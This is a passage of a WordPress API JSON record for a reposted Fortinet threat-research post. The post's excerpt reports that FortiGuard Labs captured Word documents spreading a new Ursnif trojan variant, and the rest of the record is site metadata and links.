target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image.img.png\"\/><br \/>FortiGuard Labs recently captured a number of Word documents that were spreading a new variant of the Ursnif trojan. Learn more about how it operates and the techniques it uses.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16011","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16011"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16011\/revisions"}],"wp:attachment"
:[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16011"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}